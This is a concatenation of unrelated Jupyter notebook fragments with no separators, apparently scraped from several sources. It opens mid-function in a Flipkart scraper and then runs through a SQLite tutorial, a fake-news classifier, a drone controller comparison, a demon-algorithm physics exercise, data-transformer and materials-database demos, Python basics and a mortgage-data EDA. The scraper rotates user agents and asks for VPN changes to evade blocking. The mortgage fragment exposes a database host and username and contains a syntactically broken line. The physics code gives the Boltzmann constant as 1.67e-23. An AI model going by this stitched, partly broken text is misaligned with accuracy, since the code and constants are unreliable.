the html of the webpage as text, else returns 'False'. ''' global ERROR_COUNT_B # Download the page using requests print("Downloading %s"%url) trial = 0 while(True): # Ask to change vpn every 20 pages without results to ensure data is not missed because of being blocked if ERROR_COUNT_B % 20 == 0: _ = input('Please Change VPN and enter \'DONE\' to continue') ERROR_COUNT_B += 1 if trial == MAX_TRIALS_B: print("Max trials exceeded yet no Data found on this page!") ERROR_COUNT_B += 1 return 'False' trial = trial + 1 print("Trial no:", trial) # Get the html data from the url while True: try: r = requests.get(url, headers=random.choice(headers), timeout = 15) # We use product_list.yml extractor to extract the product details from the html data text data = p.extract(r.text) # If the products title in the scraped html is not empty, return extracted details as dict. # If the products title in the scraped html is empty, retry with new user agent. 
if data['Title'] != None: return (p.extract(r.text)) else: print("Retrying with new user agent!") break except requests.exceptions.RequestException as err: print('Error Detected: ', err) print('Retrying after 30 seconds') sleep(30) continue except requests.exceptions.HTTPError as err: print('Error Detected: ', err) print('Retrying after 30 seconds') sleep(30) continue except requests.exceptions.ConnectionError as err: print('Error Detected: ', err) print('Retrying after 30 seconds') sleep(30) continue except requests.exceptions.Timeout as err: print('Error Detected: ', err) print('Retrying after 30 seconds') sleep(30) continue FileName = 'SCRAPED_KEYWORD_LIST_TOP_100_FLIPKART_BigSavingsDay_6thTo10thAUG' # FileName = 'SCRAPED_KEYWORD_LIST_APPARIO_GENERIC' #FileName = 'SCRAPED_KEYWORD_LIST_APPARIO' #FileName = 'SCRAPED_KEYWORD_LIST_CLOUDTAIL' outfile_path = str('./ScriptOutput/DATASET/' + str(FileName) + '.jsonl') # Keyword Type # Example: APPARIO GENERIC # Example: TOP 100 UK # Example: TOP 100 INDIA KeywordType = input("Enter Keyword Type") MIN_NUM_OF_PRODUCTS_TO_SCRAPE = 120 with open(outfile_path,'a') as outfile: for k in keyword_list: pg_number = 1 search_rank = 1 if k == 'EOF': break while True: if search_rank >= MIN_NUM_OF_PRODUCTS_TO_SCRAPE + 1: break # To account for differnt urls based on page number if pg_number == 1: url = str("https://www.flipkart.com/search?q="+str(k)) else: url = str("https://www.flipkart.com/search?q="+str(k)+"&page="+ str(pg_number)) data_text = scrape_SearchResult(url) if data_text == 'False': break else: # Extract all product details in a dict 'data' using the extractor file data = e.extract(data_text) if data['url_a'] is not None: urls = data['url_a'] if data['url_b'] is not None: urls = data['url_b'] # Save html text to file html_files_path = str('./ScriptOutput/HTML/'+ str(FileName) + '/' + str(k) +'/Page_'+str(pg_number)+'.html') os.makedirs(os.path.dirname(html_files_path), exist_ok=True) with open(html_files_path, 'w') as file: file.write(data_text) for product in urls: print('Product '+ str(search_rank%len(urls)) + ' of '+ str(len(urls)) + ' on this page!') # print(urls) product['SearchResultPosition'] = search_rank search_rank += 1 product['SearchKeyword'] = k product['SearchUrl'] = url date = datetime.datetime.now() product['Timestamp'] = date.strftime("%c") product['KeywordType'] = KeywordType if product['Label'] is not None: product['Label'] = 'Flipkart Assured' if 'www.flipkart.' 
in product['ProductPageUrl']: data = scrape_ProductPage(product['ProductPageUrl']) else: product['ProductPageUrl'] = 'https://www.flipkart.com'+ product['ProductPageUrl'] data = scrape_ProductPage(product['ProductPageUrl']) # print(data) if data == 'False': product['Title'] = None product['MRP'] = None product['FlipkartPrice'] = None product['DiscountPercentage'] = None product['Rating'] = None product['RatingCount'] = None product['ProductDescription'] = None product['Breadcrumbs'] = None product['FlipkartAssured'] = None print("Saving Product: %s"%product['Title']) print(product) json.dump(product,outfile) outfile.write("\n") continue product['Title'] = data['Title'] product['MRP'] = data['MRP'] product['FlipkartPrice'] = data['FlipkartPrice'] product['DiscountPercentage'] = data['DiscountPercentage'] product['Rating'] = data['Rating'] product['ProductDescription'] = data['ProductDescription'] product['RatingCount'] = data['RatingCount'] if data['FlipkartAssured'] is not None: product['FlipkartAssured'] = 'Flipkart Assured' else: product['FlipkartAssured'] = None product['Breadcrumbs'] = data['Breadcrumbs'] product['Seller'] = data['Seller'] print("Saving Product: %s"%product['Title']) print(product) json.dump(product,outfile) outfile.write("\n") pg_number += 1 # ProductPageUrl # Label # SearchResultPosition # SearchKeyword # SearchUrl # Timestamp # KeywordType # Title # FlipkartPrice # MRP # DiscountPercentage # Rating # ProductDescription # RatingCount # FlipkartAssured # Breadcrumbs # Seller
Quick Introduction
Here is a first simple but complete exercise showing how to: - create a SQLite database - create a data table - insert data into the table - query the data in the table %load_ext sql
Creating a SQLite database
It is advisable to create your own database so that you are free to perform any operation on it. If you use the SQLite shell, the .open command can be used either to create a SQLite database or to open one that already exists, like: > sqlite> .open testdb Similarly, we can use ipython-sql for the same thing: %sql sqlite:////content/writers.db3
Creating a table
***%%sql*** lets you run several SQL statements in a single notebook cell. We will create the table with a standard SQL command: **CREATE TABLE**. If the table already exists in the database, an error will be returned. We have also set ***PRIMARY KEY*** on the USERID field to avoid inserting duplicate authors into the table. %%sql sqlite:// CREATE TABLE writer( FirstName VARCHAR(50) NOT NULL, LastName VARCHAR(50) NOT NULL, USERID int NOT NULL UNIQUE, PRIMARY KEY (USERID) );Done.
Adding data to the table
The table we just created is empty, so we will insert some data into it. To add this data as rows, we will use the **INSERT** command: %%sql sqlite:// INSERT INTO writer VALUES ('William', 'Shakespeare', 1616); INSERT INTO writer VALUES ('Lin', 'Han', 1996); INSERT INTO writer VALUES ('Peter', 'Brecht', 1978);1 rows affected. 1 rows affected. 1 rows affected.
Running our first query
We will write a simple query to check the results of the previous operations, in which we created a table and inserted three rows of data.
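As an aside, the same create/insert/query round trip can be reproduced without ipython-sql by using Python's built-in sqlite3 module. A minimal sketch, reusing the writers.db3 path from the %sql connection string above:
```python
import sqlite3

# Open (or create) the same database file targeted by %sql above.
conn = sqlite3.connect("/content/writers.db3")
cur = conn.cursor()
cur.execute(
    "CREATE TABLE IF NOT EXISTS writer ("
    " FirstName VARCHAR(50) NOT NULL,"
    " LastName VARCHAR(50) NOT NULL,"
    " USERID int NOT NULL UNIQUE,"
    " PRIMARY KEY (USERID))"
)
cur.executemany(
    "INSERT OR IGNORE INTO writer VALUES (?, ?, ?)",
    [("William", "Shakespeare", 1616), ("Lin", "Han", 1996), ("Peter", "Brecht", 1978)],
)
conn.commit()
print(cur.execute("SELECT * FROM writer").fetchall())
conn.close()
```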
To run this query, we will use the command called **SELECT**. We can store the result of the query in a variable, named **sqlres** in the following example: sqlres = %sql SELECT * from writer sqlres * sqlite:////content/writers.db3 Done. You can also select specific columns by specifying their names: sqlres = %sql SELECT FirstName, LastName from writer sqlres * sqlite:////content/writers.db3 Done.
Classifier Model for True and Fake news
# The dataset "https://www.kaggle.com/clmentbisaillon/fake-and-real-news-dataset"
Import Necessary packages
import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import nltk import re import string import os #@title mount Google drive from google.colab import drive drive.mount('/content/drive') #@title Path to the datasets real_data = pd.read_csv('/content/drive/My Drive/AP Hack/datasets/True.csv') fake_data = pd.read_csv('/content/drive/My Drive/AP Hack/datasets/Fake.csv')
Basic EDA
real_data.head() fake_data.head() real_data.info() fake_data.info() real_data['target'] = 1 fake_data['target'] = 0 fake_data.tail() combine_data = pd.concat([real_data, fake_data], ignore_index=True, sort=False) combine_data.tail() plt.figure(figsize=(7, 7)) sns.set(style="darkgrid") color = sns.color_palette("Set2") ax = sns.countplot(x="target", data=combine_data, palette=color) ax.set(xticklabels=['fake', 'real']) plt.title("Data distribution of fake and real data") combine_data.isnull().sum()
Data Cleaning
import re def clean_train_data(x): text = x text = text.lower() text = re.sub(r'\[.*?\]', '', text) # remove square brackets text = re.sub(r'[^\w\s]','',text) # remove punctuation text = re.sub(r'\w*\d\w*', '', text) # remove words containing numbers text = re.sub(r'http\S+', '', text) text = re.sub('\n', '', text) return text clean_combine_data = combine_data.copy() clean_combine_data['text'] = combine_data.text.apply(lambda x : clean_train_data(x)) clean_combine_data.head() clean_combine_data.tail()
StopWord Removal
nltk.download('stopwords') nltk.download('punkt') eng_stopwords = nltk.corpus.stopwords.words("english") def remove_eng_stopwords(text): token_text = nltk.word_tokenize(text) remove_stop = [word for word in token_text if word not in eng_stopwords] join_text = ' '.join(remove_stop) return join_text stopword_combine_data = clean_combine_data.copy() stopword_combine_data['text'] = clean_combine_data.text.apply(lambda x : remove_eng_stopwords(x)) stopword_combine_data.head()
Modeling
model_data = stopword_combine_data.copy() model_data['combine_text'] = model_data['subject'] + " " + model_data['title'] + " " + model_data['text'] del model_data['title'] del model_data['subject'] del model_data['date'] del model_data['text'] model_data.head() from sklearn.model_selection import train_test_split X_train, X_test, y_train, y_test = train_test_split(model_data['combine_text'], model_data['target'], random_state=0)
Vectorizing
from sklearn.feature_extraction.text import CountVectorizer vec_train = CountVectorizer().fit(X_train) X_vec_train = vec_train.transform(X_train) X_vec_test = vec_train.transform(X_test) from sklearn.linear_model import LogisticRegression from sklearn.metrics import roc_auc_score model = LogisticRegression() model.fit(X_vec_train, y_train) predicted_value = model.predict(X_vec_test) accuracy_value = roc_auc_score(y_test, predicted_value) print(accuracy_value) 0.9985562606683752
Comparison of linear and non-linear controllers
This notebook is a pretty straightforward comparison of a linear controller
against a non-linear controller.Read through the code and run it as is! Then feel free to modify some of the parameters and play around with different trajectories.%matplotlib inline %config InlineBackend.figure_format = 'retina' %load_ext autoreload %autoreload 2 import numpy as np import math from math import sin, cos import matplotlib.pyplot as plt import matplotlib.pylab as pylab from drone import Drone2D import trajectories import simulate import plotting from controllers import LinearCascadingController, NonLinearCascadingController pylab.rcParams['figure.figsize'] = 10, 10 SPEED_UP = 5 total_time = 100.0 omega_z = 2.0 drone = Drone2D() z_k_p = 3.1 z_k_d = 10.0 y_k_p = 2.3 y_k_d = 10.0 phi_k_p = 50.0 phi_k_d = 50.0 # INSTANTIATE CONTROLLERS linear_controller = LinearCascadingController( drone.m, drone.I_x, z_k_p=z_k_p, z_k_d=z_k_d, y_k_p=y_k_p, y_k_d=y_k_d, phi_k_p=phi_k_p, phi_k_d=phi_k_d ) non_linear_controller = NonLinearCascadingController( drone.m, drone.I_x, z_k_p=z_k_p, z_k_d=z_k_d, y_k_p=y_k_p, y_k_d=y_k_d, phi_k_p=phi_k_p, phi_k_d=phi_k_d ) # GENERATE FIGURE 8 z_traj, y_traj, t = trajectories.figure_8(omega_z, total_time, dt=0.02) dt = t[1] - t[0] # SIMULATE MOTION linear_history = simulate.zy_flight(z_traj, y_traj, t, linear_controller, inner_loop_speed_up=SPEED_UP) non_linear_history = simulate.zy_flight(z_traj, y_traj, t, non_linear_controller, inner_loop_speed_up=SPEED_UP) # PLOT RESULTS pylab.rcParams['figure.figsize'] = 10, 10 plotting.compare_flight_paths(z_traj[0], y_traj[0], linear_history, non_linear_history, "Linear Controller", "Non-Linear Controller") # Error calculation z_path = z_traj[0] y_path = y_traj[0] non_linear_Err= np.sqrt((non_linear_history[:,1] - y_path[:])**2 \ +(non_linear_history[:,0] - z_path[:])**2) linear_Err= np.sqrt((linear_history[:,1] - y_path[:])**2 \ + (linear_history[:,0] - z_path[:])**2) t1=np.linspace(0.0,total_time,int(total_time*SPEED_UP/dt)) plt.plot(t,non_linear_Err,color='red',marker='.') plt.plot(t,linear_Err,color='blue') plt.xlabel('$t$ [$s$]').set_fontsize(20) plt.ylabel('$\epsilon$ [$m$]').set_fontsize(20) plt.xticks(fontsize = 14) plt.yticks(fontsize = 14) plt.legend(['non_linear','linear'],fontsize = 14) plt.show()The Demon Algorithm===========There are a number of approaches to complex problems involving large numbers of interactions where the objective is to find the "average" behavior of the system over a long period of time. We've seen that we can integrage Newton's 2nd Law to see the precise behavior of a multipartical system over time. When we have a handful of objects in a system this works well. However, if we have thousands or millions of particles, it's not practical. Looking at "average" behavior however glosses over the precision of following each interaction and attempts only to see what happens on a less fine-grained scale. This means we sacrifice the hope of getting a detailed pictured of a microscopic physical process, but achieve the reward of a more general understanding of the large scale consequences of that process. The demon algorithm is such an approach. It's a simple way to simulate the random exchange of energy between components of a system over time. Here's the basic idea:* Suppose we have a demon.. 1 Make a small change to the system. 2 Compute $\Delta E$. If $\Delta E<0$ give it to the “demon” and accept the change. 3 If $\Delta E>0$ and the demon has that much energy available, accept the change and take the energy from the demon. 
4 If the demon doesn’t have that much energy, then reject the change. Example Problem---------------Compute the height distribution of nitrogen molecules near the Earth's surface. Assume T=const. and that the weight of a molecule is constant.$$ PE(y) = m g y $$so $\Delta E$ is just $m g \Delta y$.Below is a sample program that uses the demon algorithm to approach this problem.%pylab inline # # rand() returns a single random number: # print(rand()) # # hist plots a histogram of an array of numbers # print(hist(normal(size=1000))) m=28*1.67e-27 # mass of a molecule (e.g., Nitrogen) g=9.8 # grav field strength kb=1.67e-23 # boltzman constant demonE = 0.0 # initial demon energy N=10000 # number of molecules M=400000 # number of iterations h=20000.0 # height scale def setup(N=100,L=1.0): y=L*rand(N) # put N particles at random heights (y) between 0 and L return y yarray = setup(N=1000,L=2.0) hist(yarray) def shake(y, demonE, delta=0.1): """ Pass in the current demon energy as an argument. delta is the size of change in y to generate, more or less. randomly choose a particle, change it's position slightly (around delta) return the new demon energy and a boolean (was the change accepted?) """ ix = int(rand()*len(y)) deltaY = delta*normal() deltaE = deltaY*m*g accept=False if deltaE < demonE and (y[ix]+deltaY>0): demonE -= deltaE # take the energy from the demon, or give it if deltaE<0. y[ix] += deltaY accept=True return demonE, accept y = setup(N,L=h) acceptCount = 0 demonList = [] for i in range(M): demonE,accept = shake(y, demonE, delta=0.2*h) demonList.append(demonE) if accept: acceptCount += 1 title("Distribution of heights") xlabel("height (m)") ylabel("number in height range") hist(y,bins=40) print(100.0*acceptCount/M, "percent accepted") print("Averge height=%4.3fm" % (y.sum()/len(y),)) # # Build a histogram of Demon Energies # title("Distribution of Demon Energies") xlabel("Energy Ranges (J)") ylabel("Number in Energy Ranges") ns, bins, patches = hist(demonList, bins=60)Demonic Thermometer====================You can easily see that the demon acts like an small thermometer. According to the Maxwell-Boltzmann distribution the energy distribution of the demon's energy should go like:$$P(E) = P_0 e^{-E/k_B T}$$Where $P_0$ is the basically the probability of having an energy of zero. (Actually, maybe a better way to think of it is as a normalization constant that's determined by the requirement that the total probability to have *any* energy is 1.0). The histogram of demon energies tells us the number of times the demon have various values of energy during the calculation. This is proportional to the probability that the demon had various energies. We can fit that probability to an exponential curve (or the log of the probability to a straight line) and from the slope of the line deduce the temperature!See below how the code does exactly this.# # Use a "curve fit" to find the temperature of the demon # from scipy.optimize import curve_fit def fLinear(x, m, b): return m*x + b energies = (bins[:-1]+bins[1:])/2.0 xvals = array(energies) # fit log(n) vs. energy yvals = log(array(ns)) sig = 1.0/sqrt(array(ns)) # # make initial estimates of slope and intercept. 
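# Note: since ln P(E) = ln P0 - E/(kB*T), the slope m of the straight-line fit below is
# approximately -1/(kB*T), which is why the temperature is recovered as Temp = -1.0/(m*kb).
# The initial guesses simply take the slope from the endpoints of the binned data and the
# intercept from the first bin.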
# m0 = (yvals[-1]-yvals[0])/(xvals[-1]-xvals[0]) b0 = yvals[0]-m0*xvals[0] popt, pcov = curve_fit(fLinear, xvals, yvals, p0=(m0, b0), sigma=sig) m=popt[0] # slope dm=sqrt(pcov[0,0]) # sqrt(variance(slope)) b=popt[1] # int db=sqrt(pcov[1,1]) # sqrt(variance(int)) Temp=-1.0/(m*kb) # temperature dT = abs(dm*Temp/m)# approx uncertainty in temp print("slope=", m, "+/-", dm ) print("intercept=", b, "+/-", db) print("Temperature=", Temp, "+/-", dT, "K") title("Demon Energy Distribution") xlabel("Energy (J)") ylabel("log(n) (number of demon visit to energy)") errorbar(xvals, yvals, sig, fmt='r.') plot(xvals,yvals,'b.',label="Demon Energies") plot(xvals,fLinear(xvals, m, b),'r-', label="Fit") legend()slope= -1.90714037137e+20 +/- 6.16514763062e+17 intercept= 11.1373229547 +/- 0.00459800607707 Temperature= 313.979193247 +/- 1.01498982895 KMappingTransformerThis notebook shows the functionality in the MappingTransformer class. This transformer maps column values to other values, using the pandas.DataFrame.replace function.import pandas as pd import numpy as np import tubular from tubular.mapping import MappingTransformer tubular.__version__Create dummy datasetdf = pd.DataFrame( { "factor1": [np.nan, "1.0", "2.0", "1.0", "3.0", "3.0", "2.0", "2.0", "1.0", "3.0"], "factor2": ["z", "z", "x", "y", "x", "x", "z", "y", "x", "y"], "target": [18.5, 21.2, 33.2, 53.3, 24.7, 19.2, 31.7, 42.0, 25.7, 33.9], "target_int": [2, 1, 3, 4, 5, 6, 5, 8, 9, 8], "target_binary": [0, 0, 1, 0, 1, 0, 0, 1, 0, 0] } ) df.head() df.dtypesSimple usage Initialising MappingTransformer The user must pass in a dict of mappings, each item within must be a dict of mappings for a specific column. In the mapping transformer the user does not specify columns, as with the most other transformers, instead this is picked up from the keys of mappings. In the case of factor1, there are null values if the user wishes to treat these they should use the imputation transformers in the package.column_mappings = { 'factor1': { '1.0': 'a', '2.0': 'b', '3.0': 'c', }, 'factor2': { 'x': 'aa', 'y': 'bb', 'z': 'cc' } } map_1 = MappingTransformer(mappings = column_mappings, copy = True, verbose = True) map_1.mappingsMappingTransformer fitThere is not fit method for the MappingTransformer as the user sets the mappings when initialising the object. 
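Because there is no fit step, transform reduces to a per-column dictionary lookup. As a minimal sketch, here is the equivalent operation in plain pandas (the introduction above describes the transformer as a wrapper around pandas.DataFrame.replace; the small frame below is purely illustrative):
```python
import pandas as pd

demo = pd.DataFrame({"factor2": ["z", "z", "x", "y"]})
demo_mappings = {"factor2": {"x": "aa", "y": "bb", "z": "cc"}}

# DataFrame.replace accepts a nested dict of {column: {old_value: new_value}}.
print(demo.replace(demo_mappings)["factor2"].tolist())  # ['cc', 'cc', 'aa', 'bb']
```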
MappingTransformer transformMultiple column mappings were specified when creating map_1 so these columns will be mapped when the transform method is run.df['factor1'].dtype df['factor1'].value_counts(dropna = False) df['factor2'].dtype df['factor2'].value_counts(dropna = False) df_2 = map_1.transform(df) df_2['factor1'].dtype df_2['factor1'].value_counts(dropna = False) df_2['factor2'].dtype df_2['factor2'].value_counts(dropna = False)Transforming only certain levelsIf only certain levels of a column are to be mapped then just these levels can be supplied in the mapping dict.column_mappings_2 = { 'factor1': { '1.0': '0.0', '3.0': '10.0' } } map_2 = MappingTransformer(mappings = column_mappings_2, copy = True, verbose = False) df['factor1'].dtype df['factor1'].value_counts(dropna = False).head() df_3 = map_2.transform(df) df_3['factor1'].value_counts(dropna = False).head()Column dtype conversionIf all levels of a column are included in a mapping, and the mapping converts between data types, the pandas dtype will be converted.column_mappings_3 = { 'target_binary': { 0: False, 1: True } } map_3 = MappingTransformer(mappings = column_mappings_3, copy = True, verbose = False) df['target_binary'].dtype df['target_binary'].value_counts(dropna = False).head() df_4 = map_3.transform(df) df_4['target_binary'].dtype df_4['target_binary'].value_counts(dropna = False)Unexpected dtype conversionsSpecial care should be taken if specifying only a subset of levels in a mapping - that the mapping does not introduce data type conversion. Any conversions that do happen follow the pandas dtype conversions as this transformer uses `pandas.DataFrame.map`. The example below shows how the dtype of the column 'RM' was changed by mapping a particular value to a str - following pandas dtype conversions.column_mappings_4 = { 'target_binary': { 1: True } } map_4 = MappingTransformer(mappings = column_mappings_4, copy = True, verbose = False) df['target_binary'].dtype (df['target_binary'] == 1).sum() df_5 = map_4.transform(df) df_5['target_binary'].dtype df_5['target_binary'].value_counts()Configure projectdescription = """ Ab-initio electronic transport database for inorganic materials. Here are reported the average of the eigenvalues of conductivity effective mass (mₑᶜᵒⁿᵈ), the Seebeck coefficient (S), the conductivity (σ), the electronic thermal conductivity (κₑ), and the Power Factor (PF) at a doping level of 10¹⁸ cm⁻³ and at a temperature of 300 K for n- and p-type. Also, the maximum values for S, σ, PF, and the minimum value for κₑ chosen among the temperatures [100, 1300] K, the doping levels [10¹⁶, 10²¹] cm⁻³, and doping types are reported. The properties that depend on the relaxation time are reported divided by the constant value 10⁻¹⁴. The average of the eigenvalues for all the properties at all the temperatures, doping levels, and doping types are reported in the tables for each entry. A legend of the columns of the table is provided below. 
""" legend = { 'ΔE': 'Band gap', 'V' : 'Volume', 'mₑᶜ': 'Eigenvalues (ε₁, ε₂, ε₃) of the conductivity effective mass and their average (ε̄)', 'S': 'Average eigenvalue of the Seebeck coefficient', 'σ' : 'Average eigenvalue of the conductivity', 'κₑ' : 'Average eigenvalue of the electrical thermal conductivity', 'PF': 'Average eigenvalue of the Power Factor', 'Sᵉ': 'Value (v), temperature (T), and doping level (c) at the \ maximum of the average eigenvalue of the Seebeck coefficient', 'σᵉ': 'Value (v), temperature (T), and doping level (c) at the \ maximum of the average eigenvalue of the conductivity', 'κₑᵉ': 'Value (v), temperature (T), and doping level (c) at the \ maximum of the average eigenvalue of the electrical thermal conductivity', 'PFᵉ': 'Value (v), temperature (T), and doping level (c) at the \ maximum of the average eigenvalue of the Power Factor', } client.projects.update_entry(pk=name, project={"other": None}).result() # ensure order client.projects.update_entry(pk=name, project={ 'description': description, 'other': legend, }).result() client.get_project(name).pretty() eigs_keys = ['ε₁', 'ε₂', 'ε₃', 'ε̄'] prop_defs = { 'mₑᶜ': "mₑ", 'S': "µV/K", 'σ': "1/fΩ/m/s", 'κₑ': "GW/K/m/s", 'PF': "GW/K²/m/s" } ext_defs = {"T": "K", "c": "µm⁻³"} columns = {"task": None, "type": None, "metal": None, "ΔE": "eV", "V": "ų"} for kk, unit in prop_defs.items(): for k in ["p", "n"]: if kk.startswith("mₑ"): for e in eigs_keys: columns[f"{kk}.{k}.{e}"] = unit else: columns[f"{kk}.{k}"] = unit for kk, unit in prop_defs.items(): if kk.startswith("mₑ"): continue for k in ["p", "n"]: path = f"{kk}ᵉ.{k}" columns[f"{path}.v"] = unit for a, b in ext_defs.items(): columns[f"{path}.{a}"] = b client.init_columns(name, columns)Prepare contributionsinput_dir = '/project/projectdirs/matgen/fricci/transport_data/coarse' # input_dir = '/Users/patrick/gitrepos/mp/mpcontribs-data/transport_coarse' props_map = { # original units 'cond_eff_mass': {"name": 'mₑᶜ', "unit": "mₑ"}, 'seebeck_doping': {"name": 'S', "unit": "µV/K"}, 'cond_doping': {"name": 'σ', "unit": "1/Ω/m/s"}, 'kappa_doping': {"name": 'κₑ', "unit": "W/K/m/s"}, } files = [x for x in os.scandir(input_dir) if x.is_file()] len(files) contributions = [] total = len(files) columns_name = "doping level [cm⁻³]" title_prefix = "Temperature- and Doping-Level-Dependence" titles = { 'S': "Seebeck Coefficient", 'σ': "Conductivity", 'κₑ': "Electrical Thermal Conductivity", 'PF': "Power Factor" } for obj in tqdm(files): identifier = obj.name.split('.', 1)[0].rsplit('_', 1)[-1] valid = bool(identifier.startswith('mp-') or identifier.startswith('mvc-')) if not valid: print(identifier, 'not valid') continue with gzip.open(obj.path, 'rb') as input_file: data = json.loads(input_file.read()) task_type = 'GGA+U' if 'GGA+U' in data['gap'] else 'GGA' gap = data['gap'][task_type] cdata = { "task": data['task_id'][task_type], "type": task_type, "metal": 'Yes' if gap < 0.1 else 'No', "ΔE": f"{gap} eV", "V": f"{data['volume']} ų" } tables = [] S2arr = [] for doping_type in ['p', 'n']: for key, v in props_map.items(): prop = data[task_type][key].get(doping_type, {}) d = prop.get('300', {}).get('1e+18', {}) unit = v["unit"] if d: eigs = d if isinstance(d, list) else d['eigs'] k = f"{v['name']}.{doping_type}" value = f"{np.mean(eigs)} {unit}" if key == 'cond_eff_mass': cdata[k] = {eigs_keys[-1]: value} for neig, eig in enumerate(eigs): cdata[k][eigs_keys[neig]] = f"{eig} {unit}" else: cdata[k] = value if key == 'seebeck_doping': S2 = np.dot(d['tensor'], d['tensor']) elif key == 
'cond_doping': pf = np.mean(np.linalg.eigh(np.dot(S2, d['tensor']))[0]) * 1e-8 cdata[f"PF.{doping_type}"] = f"{pf} µW/cm/K²/s" if key != "cond_eff_mass": prop_averages, dopings, cols = [], None, ['T [K]'] pf_averages = [] temps = sorted(map(int, prop.keys())) for it, temp in enumerate(temps): row = [temp] row_pf = [temp] if dopings is None: dopings = sorted(map(float, prop[str(temp)].keys())) for idop, doping in enumerate(dopings): doping_str = f'{doping:.0e}' if len(cols) <= len(dopings): cols.append(f'{doping_str}'.replace("+", "")) d = prop[str(temp)][doping_str] row.append(np.mean(d["eigs"])) tensor = d['tensor'] if key == 'seebeck_doping': S2arr.append(np.dot(tensor, tensor)) elif key == 'cond_doping': S2idx = it * len(dopings) + idop pf = np.mean(np.linalg.eigh( np.dot(S2arr[S2idx], tensor) )[0]) * 1e-8 row_pf.append(pf) prop_averages.append(row) pf_averages.append(row_pf) df_data = [np.array(prop_averages)] if key == 'cond_doping': df_data.append(np.array(pf_averages)) for ii, np_prop_averages in enumerate(df_data): nm = "PF" if ii else v["name"] u = "µW/cm/K²/s" if ii else unit df = DataFrame(np_prop_averages, columns=cols) df.set_index("T [K]", inplace=True) df.columns.name = columns_name # legend name df.attrs["name"] = f'{nm}({doping_type})' # -> used as title by default df.attrs["title"] = f'{title_prefix} of {doping_type}-type {titles[nm]}' df.attrs["labels"] = { "value": f'{nm}({doping_type}) [{u}]', # y-axis label #"variable": columns_name # alternative for df.columns.name } tables.append(df) arr_prop_avg = np_prop_averages[:,1:] #[:,[4,8,12]] max_v = np.max(arr_prop_avg) if key[0] == 's' and doping_type == 'n': max_v = np.min(arr_prop_avg) if key[0] == 'k': max_v = np.min(arr_prop_avg) arg_max = np.argwhere(arr_prop_avg==max_v)[0] elabel = f'{nm}ᵉ' cdata[elabel] = unflatten({ f'{doping_type}.v': f"{max_v} {u}", f'{doping_type}.T': f"{temps[arg_max[0]]} K", f'{doping_type}.c': f"{dopings[arg_max[1]]} cm⁻³" }) contrib = {'project': name, 'identifier': identifier, 'is_public': True} contrib["data"] = unflatten(cdata) contrib["tables"] = tables contributions.append(contrib) len(contributions)Submit contributionsclient.delete_contributions(name) client.init_columns(name, columns) client.submit_contributions(contributions, ignore_dupes=True) query = { "project": name, # "formula_contains": "Zn", # "identifier__in": ["mp-10695", "mp-760381"], # ZnS, CuS "data__type__contains": "GGA+U", "data__metal__contains": "Yes", "data__mₑᶜ__p__ε̄__value__lte": 1, "_order_by": "data__mₑᶜ__p__ε̄__value", "_fields": ["id", "identifier", "formula", "data.mₑᶜᵒⁿᵈ.p.ε̄.value"] } client.contributions.get_entries(**query).result()Numbersa = 10 b = 10.3 type(a) type(b) c = 15 a+c a-c a*b a/c a//b c%a 2**3Strings'hello' "hello" print("Hello World!") a="kumaran system" a[3] a[1:] a[:] a[::-1] a[::3] a.count('a') a.lower() a.capitalize() a.replace('y','s') help(a.translate('kum')) help(str) 'Insert String : {} {}'.format(13,43)Lists Objectmy_list = ['a','b','c','d'] my_list.index('c') my_list.extend('e') my_list my_list.append('f') my_list my_list.append('d') my_list my_list.reverse() my_list my_list = [[1,2,3],[4,5,6],[7,8,9]] [row[1] for row in my_list]Dictionarymy_dict = {"key1":"Test","key2":1,"key3":[4,5,6],"key4":True} my_dict my_dict["key1"] my_dict.clear() help(dict) my_dict my_dict.values()Tuplestup=(1,2,3,4,2) tup.count(2) help(tup) tup.index(2) tup[2]Setsmy_set = {1,3,6,2,4,8,7,3,'s'} my_set help(my_set) my_set.remove(9) my_set my_set.discard('d') my_setBooleanTrue False not True not False ! 
dir
Volume in drive C has no label. Volume Serial Number is 9C2E-C521 Directory of C:\Users\kumaran\Documents\FCS Python 02/28/2019 12:04 PM

. 02/28/2019 12:04 PM .. 02/28/2019 10:51 AM .ipynb_checkpoints 02/28/2019 12:04 PM 49,930 Basic Data Type & Objects.ipynb 1 File(s) 49,930 bytes 3 Dir(s) 75,846,221,824 bytes freeExploratory Data Analysis -- Summarizing the Data's Main Characteristics with Visualizations *HMDA Data for 2015 -- Simple Random Sample of 25,000 Tuples* -- This notebook explores the Home Mortgage Disclosure Act (HMDA) data for one year -- 2015.**Documentation:** *(1) From Visualization Class:* https://github.com/georgetown-analytics/XBUS-506-01.Visual_Analytics/blob/solution/EDA/Intro_Exploratory_Data_Analysis_Solutions.ipynb *(2) Top 50 matplotlib:* https://www.machinelearningplus.com/plots/top-50-matplotlib-visualizations-the-master-plots-python/ * Note: The features we to explore summ stats on are: * Loan Type (i.e. how many 0/1 action_taken grouped by loan type) * Agency * these are continuous so they may be tricky but give it a shot: population, tract_to_masamd_income, lien_status_nm, and others that are type 'object'* The most important to start populating our final report at the moment are action_taken, loan type, agency and if possible, lien status and hoepa status. \---# Importing Libraries. import pandas as pd import numpy as np import matplotlib.pyplot as plt import seaborn as sns import math import os import psycopg2 import pandas.io.sql as psql import sqlalchemy from sqlalchemy import create_engine from sklearn import preprocessing from sklearn.preprocessing import LabelEncoder from scipy import stats from pylab import* from matplotlib.ticker import LogLocator %matplotlib inline %config InlineBackend.figure_format = 'retina' # Postgres username, password, and database name. postgres_host = 'aws-pgsql-loan-canoe.cr3nrpkvgwaj.us-east-2.rds.amazonaws.com' postgres_port = '5432' postgres_username = 'reporting_user' postgres_password = '' postgres_dbname = "paddle_loan_canoe" postgres_str = ('postgresql://{username}:{password}@{host}:{port}/{dbname}' .format(username = postgres_username, password = , host = postgres_host, port = postgres_port, dbname = postgres_dbname) ) # Creating the connection. cnx = create_engine(postgres_str) # Reading the HMDA 2017 dataset; join population and education datasets appropriately for 2017 # for the first 50,000 rows -- as a dataframe using pandas: df. df = pd.read_sql_query ('''SELECT * From paddle_loan_canoe.interim_datasets.interim_hmda_lar_union_2010_to_2017_simplerand200k''', cnx) # Using pandas to view the first 5 rows (NB: python row and column countin starts at 0. 
